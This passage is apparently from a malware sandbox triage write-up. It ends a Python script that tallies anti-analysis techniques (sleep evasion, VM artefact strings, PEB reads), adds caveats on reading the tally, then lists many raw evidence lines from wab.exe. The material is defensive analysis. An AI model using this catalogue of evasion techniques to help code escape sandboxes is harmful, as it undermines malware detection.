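    if kind in ("Thread delayed", "Thread sleep time", "Thread sleep count",
                "Window / User API", "Last function"):
        return "sleep-evasion"
    if kind == "Process information set":
        return "error-mode-suppression"    # SetErrorMode(SEM_NOOPENFILEERRORBOX ...)
    if kind == "Binary or memory string" and VM_STRING_RE.search(detail):
        return "vm-artefact-string"
    return "uncategorised"


def parse_line(line):
    """Split one flattened evidence line into source / kind / detail, stripping link residue."""
    line = line.strip()
    if line.endswith(LINK_LABEL):
        line = line[: -len(LINK_LABEL)].rstrip()
    m = LINE_RE.match(line)
    if m is None:
        return None
    rec = {"source": m.group("source"), "kind": m.group("kind"),
           "detail": m.group("detail").strip(), "tid": None, "func_id": None,
           "proc_index": None, "addr": None, "delay_ms": None,
           "delay_is_timespan_max": False}
    t = TID_RE.match(rec["source"])
    if t:
        rec["source"], rec["tid"] = t.group("path"), int(t.group("tid"))
    if rec["kind"] == "Code function":
        f = FUNC_RE.match(rec["detail"]) or FUNC_FALLBACK_RE.match(rec["detail"])
        if f:
            rec["func_id"] = f.group("fid")
            rec["detail"] = f.group("body").rstrip(",")
            # Assumed layout of the sandbox ID: <process index>_<snapshot index>_<virtual address>.
            proc_index, _snapshot, addr = f.group("fid").split("_")
            rec["proc_index"], rec["addr"] = int(proc_index), int(addr, 16)
    if rec["kind"] == "Thread delayed":
        d = DELAY_RE.search(rec["detail"])
        if d:
            rec["delay_ms"] = int(d.group(1))
            rec["delay_is_timespan_max"] = rec["delay_ms"] == TIMESPAN_MAX_MS
    # Process name: last path component for file paths, first token for "wab.exe, <dump>" sources.
    rec["process"] = rec["source"].split("\\")[-1].split(",")[0].strip()
    rec["technique"] = classify(rec)
    return rec


def summarize(lines):
    """Count (process, technique) pairs over raw evidence lines; unparseable lines are skipped."""
    return Counter((r["process"], r["technique"]) for r in map(parse_line, lines) if r)


if __name__ == "__main__":
    for (process, technique), n in sorted(summarize(SAMPLE_LINES).items()):
        print(f"{process:16} {technique:24} {n}")
```

Run it as a script to get a per-process tally of techniques; feed it the full evidence list instead of SAMPLE_LINES to triage a report of this size. Two caveats the tally makes visible: the same function ID (for example 27_2_22A862A0) is reported once per fs:[30h] instruction, so the count measures how often the PEB is read, not how many distinct checks exist; and "Hyper-V RAW" is the Winsock provider name that ships in mswsock.dll (the report's own lines show it next to %SystemRoot%\system32\mswsock.dll), so that hit alone is weak VM evidence next to the NECVMWar / VMware_SATA_CD device path.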
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_21CB4AB4 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22A052A0 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22A872A0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22A862A0 mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22A862A0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22AB92A6 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22A792BC mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22A792BC mov ecx, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22A70283 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22A2E284 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22AC5283 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22A2329E mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22A002E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22AA12ED mov eax, dword ptr fs:[00000030h] (14 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_229EB2D3 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22AC52E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22AAF2F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_229F92C5 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_229FA2C3 mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_229E92FF mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22A1B2C0 mov eax, dword ptr fs:[00000030h] (7 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22A1F2D0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22AC5227 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_229E823B mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22A27208 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22ABD26B mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_229F6259 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_229EA250 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22A31270 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22A19274 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_229E9240 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22AA0274 mov eax, dword ptr fs:[00000030h] (12 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22A78243 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22A78243 mov ecx, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22A2724D mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_229E826B mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22A7D250 mov ecx, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22AAB256 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_229F4260 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22A233A0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22A133A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_229E8397 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_229EE388 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22A1438F mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22AC539D mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22A4739A mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22A003E9 mov eax, dword ptr fs:[00000030h] (8 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22AAF3E6 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22AC53FC mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22A0E3F0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_22A263FF mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 27_2_229FA3C0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229FA3C0 mov eax, dword ptr fs:[00000030h]27_2_229FA3C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229FA3C0 mov eax, dword ptr fs:[00000030h]27_2_229FA3C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229FA3C0 mov eax, dword ptr fs:[00000030h]27_2_229FA3C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229FA3C0 mov eax, dword ptr fs:[00000030h]27_2_229FA3C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229FA3C0 mov eax, dword ptr fs:[00000030h]27_2_229FA3C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F83C0 mov eax, dword ptr fs:[00000030h]27_2_229F83C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F83C0 mov eax, dword ptr fs:[00000030h]27_2_229F83C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F83C0 mov eax, dword ptr fs:[00000030h]27_2_229F83C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F83C0 mov eax, dword ptr fs:[00000030h]27_2_229F83C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AAC3CD mov eax, dword ptr fs:[00000030h]27_2_22AAC3CD
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A763C0 mov eax, dword ptr fs:[00000030h]27_2_22A763C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AAB3D0 mov ecx, dword ptr fs:[00000030h]27_2_22AAB3D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB132D mov eax, dword ptr fs:[00000030h]27_2_22AB132D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB132D mov eax, dword ptr fs:[00000030h]27_2_22AB132D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A1F32A mov eax, dword ptr fs:[00000030h]27_2_22A1F32A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EC310 mov ecx, dword ptr fs:[00000030h]27_2_229EC310
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2A30B mov eax, dword ptr fs:[00000030h]27_2_22A2A30B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2A30B mov eax, dword ptr fs:[00000030h]27_2_22A2A30B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2A30B mov eax, dword ptr fs:[00000030h]27_2_22A2A30B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7930B mov eax, dword ptr fs:[00000030h]27_2_22A7930B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7930B mov eax, dword ptr fs:[00000030h]27_2_22A7930B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7930B mov eax, dword ptr fs:[00000030h]27_2_22A7930B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229E7330 mov eax, dword ptr fs:[00000030h]27_2_229E7330
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A10310 mov ecx, dword ptr fs:[00000030h]27_2_22A10310
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229E9353 mov eax, dword ptr fs:[00000030h]27_2_229E9353
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229E9353 mov eax, dword ptr fs:[00000030h]27_2_229E9353
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AAF367 mov eax, dword ptr fs:[00000030h]27_2_22AAF367
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229ED34C mov eax, dword ptr fs:[00000030h]27_2_229ED34C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229ED34C mov eax, dword ptr fs:[00000030h]27_2_229ED34C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A9437C mov eax, dword ptr fs:[00000030h]27_2_22A9437C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AC5341 mov eax, dword ptr fs:[00000030h]27_2_22AC5341
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A72349 mov eax, dword ptr fs:[00000030h]27_2_22A72349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A72349 mov eax, dword ptr fs:[00000030h]27_2_22A72349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A72349 mov eax, dword ptr fs:[00000030h]27_2_22A72349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A72349 mov eax, dword ptr fs:[00000030h]27_2_22A72349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A72349 mov eax, dword ptr fs:[00000030h]27_2_22A72349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A72349 mov eax, dword ptr fs:[00000030h]27_2_22A72349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A72349 mov eax, dword ptr fs:[00000030h]27_2_22A72349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A72349 mov eax, dword ptr fs:[00000030h]27_2_22A72349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A72349 mov eax, dword ptr fs:[00000030h]27_2_22A72349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A72349 mov eax, dword ptr fs:[00000030h]27_2_22A72349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A72349 mov eax, dword ptr fs:[00000030h]27_2_22A72349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A72349 mov eax, dword ptr fs:[00000030h]27_2_22A72349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A72349 mov eax, dword ptr fs:[00000030h]27_2_22A72349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A72349 mov eax, dword ptr fs:[00000030h]27_2_22A72349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A72349 mov eax, dword ptr fs:[00000030h]27_2_22A72349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F7370 mov eax, dword ptr fs:[00000030h]27_2_229F7370
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F7370 mov eax, dword ptr fs:[00000030h]27_2_229F7370
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F7370 mov eax, dword ptr fs:[00000030h]27_2_229F7370
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22ABA352 mov eax, dword ptr fs:[00000030h]27_2_22ABA352
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7035C mov eax, dword ptr fs:[00000030h]27_2_22A7035C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7035C mov eax, dword ptr fs:[00000030h]27_2_22A7035C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7035C mov eax, dword ptr fs:[00000030h]27_2_22A7035C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7035C mov ecx, dword ptr fs:[00000030h]27_2_22A7035C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7035C mov eax, dword ptr fs:[00000030h]27_2_22A7035C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7035C mov eax, dword ptr fs:[00000030h]27_2_22A7035C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A880A8 mov eax, dword ptr fs:[00000030h]27_2_22A880A8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F5096 mov eax, dword ptr fs:[00000030h]27_2_229F5096
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229ED08D mov eax, dword ptr fs:[00000030h]27_2_229ED08D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB60B8 mov eax, dword ptr fs:[00000030h]27_2_22AB60B8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB60B8 mov ecx, dword ptr fs:[00000030h]27_2_22AB60B8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F208A mov eax, dword ptr fs:[00000030h]27_2_229F208A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7D080 mov eax, dword ptr fs:[00000030h]27_2_22A7D080
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7D080 mov eax, dword ptr fs:[00000030h]27_2_22A7D080
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A1D090 mov eax, dword ptr fs:[00000030h]27_2_22A1D090
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A1D090 mov eax, dword ptr fs:[00000030h]27_2_22A1D090
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2909C mov eax, dword ptr fs:[00000030h]27_2_22A2909C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A150E4 mov eax, dword ptr fs:[00000030h]27_2_22A150E4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A150E4 mov ecx, dword ptr fs:[00000030h]27_2_22A150E4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A760E0 mov eax, dword ptr fs:[00000030h]27_2_22A760E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A320F0 mov ecx, dword ptr fs:[00000030h]27_2_22A320F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov eax, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov ecx, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov ecx, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov eax, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov ecx, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov ecx, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov eax, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov eax, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov eax, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov eax, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov eax, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov eax, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov eax, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov eax, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov eax, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov eax, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov eax, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A070C0 mov eax, dword ptr fs:[00000030h]27_2_22A070C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A6D0C0 mov eax, dword ptr fs:[00000030h]27_2_22A6D0C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A6D0C0 mov eax, dword ptr fs:[00000030h]27_2_22A6D0C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EC0F0 mov eax, dword ptr fs:[00000030h]27_2_229EC0F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AC50D9 mov eax, dword ptr fs:[00000030h]27_2_22AC50D9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F80E9 mov eax, dword ptr fs:[00000030h]27_2_229F80E9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A720DE mov eax, dword ptr fs:[00000030h]27_2_22A720DE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A190DB mov eax, dword ptr fs:[00000030h]27_2_22A190DB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EA0E3 mov ecx, dword ptr fs:[00000030h]27_2_229EA0E3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB903E mov eax, dword ptr fs:[00000030h]27_2_22AB903E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB903E mov eax, dword ptr fs:[00000030h]27_2_22AB903E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB903E mov eax, dword ptr fs:[00000030h]27_2_22AB903E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB903E mov eax, dword ptr fs:[00000030h]27_2_22AB903E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A74000 mov ecx, dword ptr fs:[00000030h]27_2_22A74000
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A0E016 mov eax, dword ptr fs:[00000030h]27_2_22A0E016
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A0E016 mov eax, dword ptr fs:[00000030h]27_2_22A0E016
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A0E016 mov eax, dword ptr fs:[00000030h]27_2_22A0E016
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A0E016 mov eax, dword ptr fs:[00000030h]27_2_22A0E016
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EA020 mov eax, dword ptr fs:[00000030h]27_2_229EA020
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EC020 mov eax, dword ptr fs:[00000030h]27_2_229EC020
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7106E mov eax, dword ptr fs:[00000030h]27_2_22A7106E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AC5060 mov eax, dword ptr fs:[00000030h]27_2_22AC5060
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F2050 mov eax, dword ptr fs:[00000030h]27_2_229F2050
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A01070 mov eax, dword ptr fs:[00000030h]27_2_22A01070
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A01070 mov ecx, dword ptr fs:[00000030h]27_2_22A01070
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A01070 mov eax, dword ptr fs:[00000030h]27_2_22A01070
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A01070 mov eax, dword ptr fs:[00000030h]27_2_22A01070
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A01070 mov eax, dword ptr fs:[00000030h]27_2_22A01070
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A01070 mov eax, dword ptr fs:[00000030h]27_2_22A01070
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A01070 mov eax, dword ptr fs:[00000030h]27_2_22A01070
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A01070 mov eax, dword ptr fs:[00000030h]27_2_22A01070
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A01070 mov eax, dword ptr fs:[00000030h]27_2_22A01070
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A01070 mov eax, dword ptr fs:[00000030h]27_2_22A01070
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A01070 mov eax, dword ptr fs:[00000030h]27_2_22A01070
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A01070 mov eax, dword ptr fs:[00000030h]27_2_22A01070
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A01070 mov eax, dword ptr fs:[00000030h]27_2_22A01070
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A1C073 mov eax, dword ptr fs:[00000030h]27_2_22A1C073
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A6D070 mov ecx, dword ptr fs:[00000030h]27_2_22A6D070
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A1B052 mov eax, dword ptr fs:[00000030h]27_2_22A1B052
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A9705E mov ebx, dword ptr fs:[00000030h]27_2_22A9705E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A9705E mov eax, dword ptr fs:[00000030h]27_2_22A9705E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A76050 mov eax, dword ptr fs:[00000030h]27_2_22A76050
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EA197 mov eax, dword ptr fs:[00000030h]27_2_229EA197
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EA197 mov eax, dword ptr fs:[00000030h]27_2_229EA197
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EA197 mov eax, dword ptr fs:[00000030h]27_2_229EA197
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA11A4 mov eax, dword ptr fs:[00000030h]27_2_22AA11A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA11A4 mov eax, dword ptr fs:[00000030h]27_2_22AA11A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA11A4 mov eax, dword ptr fs:[00000030h]27_2_22AA11A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AA11A4 mov eax, dword ptr fs:[00000030h]27_2_22AA11A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A0B1B0 mov eax, dword ptr fs:[00000030h]27_2_22A0B1B0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AAC188 mov eax, dword ptr fs:[00000030h]27_2_22AAC188
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AAC188 mov eax, dword ptr fs:[00000030h]27_2_22AAC188
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A30185 mov eax, dword ptr fs:[00000030h]27_2_22A30185
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A47190 mov eax, dword ptr fs:[00000030h]27_2_22A47190
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7019F mov eax, dword ptr fs:[00000030h]27_2_22A7019F
